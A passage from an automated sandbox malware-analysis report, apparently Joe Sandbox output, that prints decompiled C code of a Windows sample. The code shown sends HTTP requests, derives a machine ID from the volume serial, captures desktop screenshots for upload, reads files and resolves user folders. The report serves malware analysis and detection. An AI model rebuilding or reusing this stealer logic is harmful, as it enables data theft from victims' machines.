							E0040EAEF(E0040EB29(E0040EB29( &_v84, 0,  &_v16,  &_v56, _t465), 0,  &_v68,  &_v28, _t465), 0,  &_v84);
							E004016EF(_v28);
							E004016EF(_v56);
							_t346 =  *0x61367c( *0x61367c(_v84));
							_t363 = _v32;
							HttpSendRequestA(_t363, _v108, _t346, _v108, _v84); // executed
							while(InternetReadFile(_t363,  &_v2240, 0x7cf,  &_v32) != 0) {
								_t351 = _v32;
								__eflags = _t351;
								if(__eflags != 0) {
									 *((char*)(_t454 + _t351 - 0x8bc)) = 0;
									E0040EAEF(E0040EB6B(_a4, 0,  &_v120, __eflags,  &_v2240), 0, _a4);
									E004016EF(_v120);
									continue;
								}
								break;
							}
							InternetCloseHandle(_t363); // executed
							E004016EF(_v84);
						}
						InternetCloseHandle(_v36);
					}
				}
				InternetCloseHandle(_v72);
				_t185 = E00404BBC( &_v40, 0,  &_v44,  *_a4);
				_pop(_t367);
				_t467 = _t185;
				if(_t185 != 0) {
					E0040EAAB(_t367, _a4, 0x40fbe1);
					E0040EAEF(E0040EB6B(_a4, _t367,  &_v120, _t467, _v40), _t367, _a4);
					E004016EF(_v120);
				}
				_v36 =  &_v40;
				memset(_v36, 0, 4 << 0);
				_v36 =  &_v44;
				memset(_v36, 0, 4 << 0);
				E004016EF(_v108);
				E004016EF(_v68);
				E004016EF(_v16);
				E004016EF(_v96);
				E004016EF(_a8);
				E004016EF(_a20);
				E004016EF(_a32);
				return _a4;
			}

0x0040310b
0x0040311f
0x0040312a
0x0040312b
0x00403135
0x0040313e
0x00403149
0x00403152
0x0040315b
0x00403164
0x0040316d
0x0040317c
0x00403182
0x00403188
0x0040318b
0x00403191
0x0040319c
0x0040319e
0x0040319e
0x004031a1
0x004031a4
0x004031af
0x004031b6
0x004031c5
0x004031cd
0x004031d5
0x004031ed
0x004031f5
0x0040320d
0x00403215
0x0040322b
0x00403233
0x0040324b
0x00403253
0x0040326b
0x00403273
0x00403294
0x0040329c
0x004032a4
0x004032c0
0x004032c6
0x004032cb
0x004032d7
0x004032fb
0x00403301
0x00403304
0x00403306
0x0040331f
0x00403327
0x0040333a
0x00403342
0x0040335a
0x00403362
0x0040337b
0x00403383
0x0040339c
0x004033a4
0x004033bc
0x004033c4
0x004033da
0x004033e2
0x004033fa
0x00403402
0x0040341a
0x00403422
0x00403438
0x00403440
0x00403458
0x00403460
0x00403479
0x00403481
0x0040349a
0x004034a2
0x004034ba
0x004034c2
0x004034d8
0x004034e0
0x004034e9
0x0040350a
0x00403512
0x0040351a
0x0040352f
0x00403535
0x0040353d
0x0040357b
0x0040354a
0x0040354d
0x0040354f
0x00403551
0x0040356e
0x00403576
0x00000000
0x00403576
0x00000000
0x0040354f
0x00403593
0x0040359c
0x0040359c
0x004035a4
0x004035a4
0x004032cb
0x004035ad
0x004035be
0x004035c3
0x004035c4
0x004035c6
0x004035d0
0x004035e6
0x004035ee
0x004035ee
0x004035f6
0x00403603
0x00403608
0x00403615
0x0040361a
0x00403622
0x0040362a
0x00403632
0x0040363a
0x00403642
0x0040364a
0x00403656

APIs

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

Part of subcall function 00403093: malloc.MSVCRT ref: 004030C5
Part of subcall function 00403093: malloc.MSVCRT ref: 004030CB
Part of subcall function 00403093: malloc.MSVCRT ref: 004030D1
Part of subcall function 00403093: lstrlen.KERNEL32(000000FF,00000000,?), ref: 004030E3
Part of subcall function 00403093: InternetCrackUrlA.WININET(000000FF,00000000), ref: 004030EB

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040317C
StrCmpCA.SHLWAPI(?), ref: 00403194
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004032C0
lstrlen.KERNEL32(?,0040FBE1,",004120A8,------,004120A8,",004120A8,------), ref: 00403522
lstrlen.KERNEL32(?,?,00000000), ref: 0040352F
HttpSendRequestA.WININET(?,?,00000000), ref: 0040353D
InternetReadFile.WININET(?,?,000007CF,?), ref: 00403588
InternetCloseHandle.WININET(?), ref: 00403593
InternetCloseHandle.WININET(?), ref: 004035A4
InternetCloseHandle.WININET(?), ref: 004035AD
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004032FB

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Strings

", xrefs: 004033A9, 004034A7
------, xrefs: 004031FA, 0040330C, 00403407

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandlemalloc$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$------
API String ID: 1813609094-2370822465
Opcode ID: 8482b180a659460bec81e3fc967a209e7118d79a9e07af22f562f7fa756179d1
Instruction ID: 70c39e3d47d4bdc94ca0c51e98a78f39c19efb27d647a059614a6c8cba3a9041
Opcode Fuzzy Hash: 8482b180a659460bec81e3fc967a209e7118d79a9e07af22f562f7fa756179d1
Instruction Fuzzy Hash: CDF17631E00119ABCF00FBA6DC829DDBBB6BF04308F554576B505B72A1D7396E5ACB88

Uniqueness

Uniqueness Score: -1.00%

Function 00408DBB Relevance: 19.7, APIs: 13, Instructions: 248
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00408DBB(void* __ebx, void* __esi, intOrPtr _a4, signed int _a16) {
				char _v8;
				char _v12;
				void* _v16;
				signed int _v20;
				char _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v376;
				char _v636;
				short _t89;
				intOrPtr* _t91;
				void* _t101;
				char* _t104;
				void* _t105;
				intOrPtr* _t115;
				intOrPtr* _t147;
				intOrPtr* _t155;
				intOrPtr* _t163;
				intOrPtr* _t171;
				void* _t173;
				void* _t181;
				void* _t184;
				intOrPtr _t185;
				void* _t189;
				signed int _t195;
				void* _t197;
				signed int _t206;
				intOrPtr* _t209;
				intOrPtr _t225;
				intOrPtr _t226;
				void* _t227;
				void* _t230;

				_t197 = __ebx;
				_t89 = 0x7c;
				_v8 = _t89;
				_t91 =  &_v8;
				_v20 = 1;
				__imp__strtok_s(_a4, _t91,  &_v12);
				_t209 = _t91;
				_v16 =  &_v636;
				memset(_v16, 0, 0x104 << 0);
				_v16 =  &_v376;
				memset(_v16, 0, 0x104 << 0);
				_t230 = _t227 + 0x24;
				_t201 = 0;
				if(_t209 == 0) {
					L25:
					return E004016EF(_a4);
				} else {
					do {
						_t101 = _v20 - 1;
						if(_t101 == 0) {
							_t223 =  *(_t197 + 0xc) * 0x30 + _a16;
							L21:
							_push(_t209);
							L22:
							E0040EAAB(_t201, _t223);
							goto L23;
						}
						_t105 = _t101 - 1;
						if(_t105 == 0) {
							_v16 =  &_v636;
							memset(_v16, 0, 0x104 << 0);
							_v16 =  &_v376;
							memset(_v16, 0, 0x104 << 0);
							 *0x6137e8( &_v636, _t209);
							_t115 = E0040D93A( &_v104, 0x10); // executed
							 *0x6137e8( &_v376, E0040DC37( &_v636,  *0x613350,  *_t115));
							E004016EF(_v104);
							 *0x6137e8( &_v376, E0040DC37( &_v376,  *0x6133d4,  *((intOrPtr*)(E0040D93A( &_v56, 0x1a)))));
							E004016EF(_v56);
							 *0x6137e8( &_v376, E0040DC37( &_v376,  *0x6133a0,  *((intOrPtr*)(E0040D93A( &_v32, 0x1c)))));
							E004016EF(_v32);
							 *0x6137e8( &_v376, E0040DC37( &_v376,  *0x613210,  *((intOrPtr*)(E0040D93A( &_v80, 0x28)))));
							E004016EF(_v80);
							_t147 = E0040D93A( &_v116, 5); // executed
							 *0x6137e8( &_v376, E0040DC37( &_v376,  *0x613220,  *_t147));
							E004016EF(_v116);
							_t155 = E0040D93A( &_v44, 0x26); // executed
							 *0x6137e8( &_v376, E0040DC37( &_v376,  *0x613074,  *_t155));
							E004016EF(_v44);
							_t163 = E0040D93A( &_v68, 0x2a); // executed
							 *0x6137e8( &_v376, E0040DC37( &_v376,  *0x61346c,  *_t163));
							E004016EF(_v68);
							_t171 = E0040D93A( &_v92, 8); // executed
							_t173 = E0040DC37( &_v376,  *0x613280,  *_t171);
							_t230 = _t230 + 0x78;
							 *0x6137e8( &_v376, _t173);
							E004016EF(_v92);
							_t201 = _a16;
							_push( &_v376);
							_t223 =  *(_t197 + 0xc) * 0x30 + _a16 + 0xc;
							goto L22;
						}
						_t181 = _t105 - 1;
						if(_t181 == 0) {
							_t201 = _a16;
							_t223 =  *(_t197 + 0xc) * 0x30 + _a16 + 0x18;
							goto L21;
						}
						_t184 = _t181 - 1;
						if(_t184 == 0) {
							_t206 = 0;
							while(1) {
								_t185 =  *_t209;
								if(_t185 == 0) {
									break;
								}
								_t206 = _t206 * 0xa + _t185 - 0x30;
								_t209 = _t209 + 1;
							}
							 *( *(_t197 + 0xc) * 0x30 + _a16 + 0x24) = _t206;
							goto L23;
						}
						_t189 = _t184 - 1;
						if(_t189 == 0) {
							_push("1");
							_push(_t209);
							_t225 = 0;
							if( *0x613784() == 0) {
								_t225 = 1;
							}
							_t201 = _a16;
							 *((intOrPtr*)( *(_t197 + 0xc) * 0x30 + _a16 + 0x28)) = _t225;
						} else {
							if(_t189 == 1) {
								_push("1");
								_push(_t209);
								_t226 = 0;
								if( *0x613784() == 0) {
									_t226 = 1;
								}
								_t195 =  *(_t197 + 0xc);
								_v20 = _v20 & 0x00000000;
								_t201 = _t195 * 0x30;
								 *((intOrPtr*)(_t195 * 0x30 + _a16 + 0x2c)) = _t226;
								 *(_t197 + 0xc) = _t195 + 1;
							}
						}
						L23:
						_t104 =  &_v8;
						__imp__strtok_s(0, _t104,  &_v12);
						_t230 = _t230 + 0xc;
						_v20 = _v20 + 1;
						_t209 = _t104;
					} while (_t209 != 0);
					goto L25;
				}
			}

0x00408dbb
0x00408dc7
0x00408dc8
0x00408dd0
0x00408dd7
0x00408dde
0x00408de4
0x00408def
0x00408dfc
0x00408e04
0x00408e11
0x00408e11
0x00408e11
0x00408e15
0x004090fc
0x00409106
0x00408e1b
0x00408e1c
0x00408e1f
0x00408e20
0x004090d2
0x004090d5
0x004090d5
0x004090d6
0x004090d6
0x00000000
0x004090d6
0x00408e26
0x00408e27
0x00408ed4
0x00408ee1
0x00408ee9
0x00408ef6
0x00408f00
0x00408f0b
0x00408f2e
0x00408f37
0x00408f64
0x00408f6d
0x00408f9a
0x00408fa3
0x00408fd0
0x00408fd9
0x00408fe3
0x00409006
0x0040900f
0x00409019
0x0040903c
0x00409045
0x0040904f
0x00409072
0x0040907b
0x00409085
0x00409098
0x0040909d
0x004090a8
0x004090b1
0x004090b6
0x004090bf
0x004090c6
0x00000000
0x004090c6
0x00408e2d
0x00408e2e
0x00408ebf
0x00408ec5
0x00000000
0x00408ec5
0x00408e34
0x00408e35
0x00408e95
0x00408ea4
0x00408ea4
0x00408ea8
0x00000000
0x00000000
0x00408e9f
0x00408ea3
0x00408ea3
0x00408eb3
0x00000000
0x00408eb3
0x00408e37
0x00408e38
0x00408e70
0x00408e75
0x00408e76
0x00408e80
0x00408e82
0x00408e82
0x00408e86
0x00408e8c
0x00408e3a
0x00408e3b
0x00408e41
0x00408e46
0x00408e47
0x00408e51
0x00408e53
0x00408e53
0x00408e54
0x00408e57
0x00408e60
0x00408e64
0x00408e68
0x00408e68
0x00408e3b
0x004090db
0x004090df
0x004090e5
0x004090eb
0x004090ee
0x004090f1
0x004090f3
0x00000000
0x004090fb

APIs

strtok_s.MSVCRT ref: 00408DDE
StrCmpCA.SHLWAPI(00000000,00412140), ref: 00408E49

Part of subcall function 0040D93A: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,0040FBE1,?), ref: 0040D96B

Part of subcall function 0040DC37: StrStrA.SHLWAPI(?,00000010,?,?,?,00408F23,00000000,00000010), ref: 0040DC42
Part of subcall function 0040DC37: lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,?,?,?,?,00408F23,00000000,00000010), ref: 0040DC5B
Part of subcall function 0040DC37: lstrlen.KERNEL32(00000010,?,?,?,00408F23,00000000,00000010), ref: 0040DC6D
Part of subcall function 0040DC37: wsprintfA.USER32 ref: 0040DC7F

StrCmpCA.SHLWAPI(00000000,00412140), ref: 00408E78
lstrcpy.KERNEL32(?,00000000), ref: 00408F00
lstrcpy.KERNEL32(?,00000000), ref: 00408F2E
lstrcpy.KERNEL32(?,00000000), ref: 00408F64
lstrcpy.KERNEL32(?,00000000), ref: 00408F9A
lstrcpy.KERNEL32(?,00000000), ref: 00408FD0
lstrcpy.KERNEL32(?,00000000), ref: 00409006
lstrcpy.KERNEL32(?,00000000), ref: 0040903C
lstrcpy.KERNEL32(?,00000000), ref: 00409072
lstrcpy.KERNEL32(?,00000000), ref: 004090A8
strtok_s.MSVCRT ref: 004090E5

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$FolderPathlstrcpynlstrlenwsprintf
String ID:
API String ID: 520177711-0
Opcode ID: 9b0626213e90742a4705f6aace0117e4b939ba1672e60a0aebcd79e3253abab8
Instruction ID: 726f0e0204e9813137688d096569072e8cc73510ce7b55c4fc771d9d5acf53f1
Opcode Fuzzy Hash: 9b0626213e90742a4705f6aace0117e4b939ba1672e60a0aebcd79e3253abab8
Instruction Fuzzy Hash: 46A13CB1900119ABCF10EFA1DD859CEB7B9EF04304F0491BBE509F72A5EB369A458F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040D12F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040D12F(void* __eax) {
				char _v5;
				short _v7;
				char _v8;
				long _v12;
				intOrPtr _v18;
				signed short _v24;
				signed int _v28;
				char _v292;
				void* __esi;
				signed int _t28;
				signed int _t30;
				signed int _t32;
				void* _t42;
				CHAR* _t44;
				void* _t45;
				void* _t46;

				_t45 = __eax;
				_v12 = 0;
				if(GetWindowsDirectoryA( &_v292, 0x104) == 0) {
					_v292 = 0x43;
				}
				_v8 = _v292;
				_v7 = 0x5c3a;
				_v5 = 0;
				GetVolumeInformationA( &_v8, 0, 0,  &_v12, 0, 0, 0, 0); // executed
				_t28 = _v12 * 0x14a30b - 0x69427551;
				_v28 = _t28;
				_t30 = _t28 * 0x14a30b - 0x69427551;
				_v24 = _t30;
				_t32 = _t30 * 0x14a30b - 0x69427551;
				_t42 = 0;
				do {
					_t32 = _t32 * 0x14a30b - 0x69427551;
					 *(_t46 + _t42 - 0x10) = _t32;
					_t42 = _t42 + 1;
				} while (_t42 < 8);
				_v12 = _t32;
				_t44 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t52 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44,  *0x61302c, _v28, _v24 & 0x0000ffff, _v18);
					_push(_t44);
				} else {
					_push(0);
				}
				E0040EA50(_t45, _t52);
				return _t45;
			}

0x0040d13b
0x0040d14c
0x0040d157
0x0040d159
0x0040d159
0x0040d16a
0x0040d177
0x0040d17d
0x0040d180
0x0040d194
0x0040d196
0x0040d19f
0x0040d1a1
0x0040d1ab
0x0040d1ad
0x0040d1af
0x0040d1b5
0x0040d1b7
0x0040d1bb
0x0040d1bc
0x0040d1c3
0x0040d1d3
0x0040d1d5
0x0040d1d7
0x0040d1ee
0x0040d1f7
0x0040d1d9
0x0040d1d9
0x0040d1d9
0x0040d1f8
0x0040d203

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,0040FBE1), ref: 0040D14F
GetVolumeInformationA.KERNEL32(?,00000000,00000000,0040C9E0,00000000,00000000,00000000,00000000,?,?,0040FBE1), ref: 0040D180
GetProcessHeap.KERNEL32(00000000,00000104,?,?,0040FBE1), ref: 0040D1C6
RtlAllocateHeap.NTDLL(00000000), ref: 0040D1CD
wsprintfA.USER32 ref: 0040D1EE

Strings

:\, xrefs: 0040D177
C, xrefs: 0040D159
QuBi, xrefs: 0040D18F

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C$QuBi
API String ID: 2572753744-239756005
Opcode ID: ec77826f1473809ca82b8f433266f80283114bbb5542b5eb72dcf2ddadfa6a73
Instruction ID: 94b5be53baddd6c1a3562c7ef161e58ec189255f8dbd326f73e2ff3e418d0d6f
Opcode Fuzzy Hash: ec77826f1473809ca82b8f433266f80283114bbb5542b5eb72dcf2ddadfa6a73
Instruction Fuzzy Hash: 2921C1B2A04109BECB009FB88D848EFBEBDEB4D344F0450BAF106E6251E234CB018765

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA8F Relevance: 13.6, APIs: 9, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E0040DA8F(char _a4) {
				char _v8;
				void* _v12;
				char _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				char _v52;
				int _v56;
				int _v60;
				int _v64;
				char _v68;
				struct tagRECT _v84;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t55;
				void* _t59;
				struct HDC__* _t64;
				void* _t65;
				void* _t66;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t75;
				void* _t95;
				intOrPtr _t98;
				void* _t104;
				void* _t105;

				_v68 = 1;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v32 =  &_v68;
				memset(_v32, 0, 0x10 << 0);
				_t105 = _t104 + 0xc;
				_v68 = 1;
				_t55 =  *0x613768( &_v28,  &_v68, 0); // executed
				if(_t55 == 0) {
					_t59 =  *0x6136ec(0, 1,  &_v8); // executed
					if(_t59 == 0) {
						_v24 = GetDesktopWindow();
						GetWindowRect(_v24,  &_v84);
						_t98 =  *0x6137c8(_v24);
						_v40 = _t98;
						_t64 =  *0x6136b0(_t98);
						_v20 = _t64;
						_t65 =  *0x61362c(_t98, _v84.right, _v84.bottom);
						_v32 = _t65;
						_t66 = SelectObject(_v20, _t65);
						_v36 = _t66;
						 *0x6135fc(_v20, 0, 0, _v84.right, _v84.bottom, _t98, 0, 0, 0xcc0020);
						_t69 =  *0x613738(_v32, 0,  &_v16); // executed
						if(_t69 == 0) {
							_t71 = E0040D9F5( &_v100);
							_pop(_t95);
							if(_t71 != 0xffffffff) {
								_t73 =  *0x613708(_v16, _v8,  &_v100, 0); // executed
								_t113 = _t73;
								if(_t73 == 0) {
									_t75 =  *0x613604(_v8,  &_v12);
									GlobalFix(_v12);
									_t106 = _t105 - 0xc;
									E0040EA50(_t105 - 0xc, _t113,  *0x6131cc);
									E00401581( &_a4, _t106 - 0x50);
									E00403721(_t95, _t113); // executed
									E004016EF(_v52);
									SelectObject(_v20, _v36);
									 *0x613668(_v16,  &_v52, _t75, GlobalSize(_v12)); // executed
									 *0x613750(_v28);
									DeleteObject(_v32);
									DeleteObject(_v20);
									 *0x613760(_v24, _v40);
									CloseWindow(_v24); // executed
								}
							}
						}
					}
				}
				E00401562( &_a4);
				return 0;
			}

0x0040daa0
0x0040daa3
0x0040daa6
0x0040daa9
0x0040daac
0x0040dab9
0x0040dab9
0x0040dac4
0x0040dac7
0x0040dacf
0x0040dadb
0x0040dae3
0x0040daef
0x0040daf9
0x0040db08
0x0040db0b
0x0040db0e
0x0040db17
0x0040db1e
0x0040db28
0x0040db2b
0x0040db3c
0x0040db47
0x0040db55
0x0040db5d
0x0040db67
0x0040db6c
0x0040db70
0x0040db81
0x0040db87
0x0040db89
0x0040db96
0x0040db9f
0x0040dbb2
0x0040dbbd
0x0040dbca
0x0040dbd3
0x0040dbde
0x0040dbe9
0x0040dbf2
0x0040dbfb
0x0040dc04
0x0040dc0d
0x0040dc19
0x0040dc22
0x0040dc22
0x0040db89
0x0040db70
0x0040db5d
0x0040dae3
0x0040dc2b
0x0040dc36

APIs

GetDesktopWindow.USER32 ref: 0040DAE9
GetWindowRect.USER32(?,?), ref: 0040DAF9
SelectObject.GDI32(?,00000000), ref: 0040DB2B
GlobalFix.KERNEL32(?), ref: 0040DB9F
GlobalSize.KERNEL32(?), ref: 0040DBAA

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 00403721: lstrlen.KERNEL32(?), ref: 0040377A
Part of subcall function 00403721: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004037C9
Part of subcall function 00403721: StrCmpCA.SHLWAPI(?), ref: 004037DE

SelectObject.GDI32(?,?), ref: 0040DBE9
DeleteObject.GDI32(?), ref: 0040DC04
DeleteObject.GDI32(?), ref: 0040DC0D
CloseWindow.USER32(?), ref: 0040DC22

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Object$Window$DeleteGlobalSelect$CloseDesktopInternetOpenRectSizelstrcpylstrlen
String ID:
API String ID: 345882496-0
Opcode ID: 047d0de0ebbc3a1f4acdd3c0e23e2de2a9278bd9af7db95344577d28df230836
Instruction ID: d3f0765a452a20c8bc2b8dd3858cd34d99c46c3182ed5670540fdded2010b12c
Opcode Fuzzy Hash: 047d0de0ebbc3a1f4acdd3c0e23e2de2a9278bd9af7db95344577d28df230836
Instruction Fuzzy Hash: 1A51C6B2C00129BFDF019FE5DD498EEBFBAFF08311B18552AF502A2260D7354A15DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404B20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404B20(void** __ebx, long* __esi, char _a4) {
				struct _OVERLAPPED* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				long _v24;
				void* _t15;
				long _t21;
				void* _t22;
				int _t23;
				void** _t26;

				_t26 = __ebx;
				_t1 =  &_a4; // 0x407c68
				_v8 = 0;
				_t15 = CreateFileA( *_t1, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v12 = _t15;
				if(_t15 == 0 || _t15 == 0xffffffff) {
					L10:
					E004016EF(_a4);
					return _v8;
				} else {
					_push( &_v24);
					_push(_t15);
					if( *0x6135e8() != 0 && _v20 == 0) {
						_t21 = _v24;
						 *__esi = _t21; // executed
						_t22 = LocalAlloc(0x40, _t21); // executed
						 *__ebx = _t22;
						if(_t22 != 0) {
							_t23 = ReadFile(_v12, _t22,  *__esi,  &_v16, 0); // executed
							if(_t23 == 0 ||  *__esi != _v16) {
								_v8 = 0;
								LocalFree( *_t26);
							} else {
								_v8 = 1;
							}
						}
					}
					FindCloseChangeNotification(_v12); // executed
					goto L10;
				}
			}

0x00404b20
0x00404b35
0x00404b38
0x00404b3b
0x00404b41
0x00404b46
0x00404bae
0x00404bb1
0x00404bbb
0x00404b4d
0x00404b50
0x00404b51
0x00404b5a
0x00404b61
0x00404b67
0x00404b69
0x00404b6f
0x00404b73
0x00404b80
0x00404b88
0x00404b9c
0x00404b9f
0x00404b91
0x00404b91
0x00404b91
0x00404b88
0x00404b73
0x00404ba8
0x00000000
0x00404ba8

APIs

CreateFileA.KERNEL32(h|@,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,00407C68,?), ref: 00404B3B
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00407C68,?), ref: 00404B52
LocalAlloc.KERNEL32(00000040,?,?,?,?,00407C68,?), ref: 00404B69
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00407C68,?), ref: 00404B80
LocalFree.KERNEL32(?,?,?,?,00407C68,?), ref: 00404B9F
FindCloseChangeNotification.KERNEL32(?,?,?,?,00407C68,?), ref: 00404BA8

Strings

h|@, xrefs: 00404B35

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: h|@
API String ID: 1815715184-1288910048
Opcode ID: ba8c0b203ef1c9d5027e130da983996f8e5ef426966dc87c4ecb70eb39633bea
Instruction ID: db158a5a3f6e7956999087060c845e66870b9c664a5317dd3885771cdf3efbc9
Opcode Fuzzy Hash: ba8c0b203ef1c9d5027e130da983996f8e5ef426966dc87c4ecb70eb39633bea
Instruction Fuzzy Hash: 5F111CB0900214FFDB219FA5CD88EAEBBB5EB84700F24456AF502B62D0D739AA51DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00402FD2 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00402FD2(void* __esi, intOrPtr _a4) {
				void* _v8;
				char _v12;
				void* _v16;
				char* _t20;
				signed int _t21;
				signed int _t23;
				void* _t27;
				char* _t28;
				char* _t31;
				char* _t33;
				char* _t36;
				char* _t40;
				signed int _t45;
				signed int _t46;
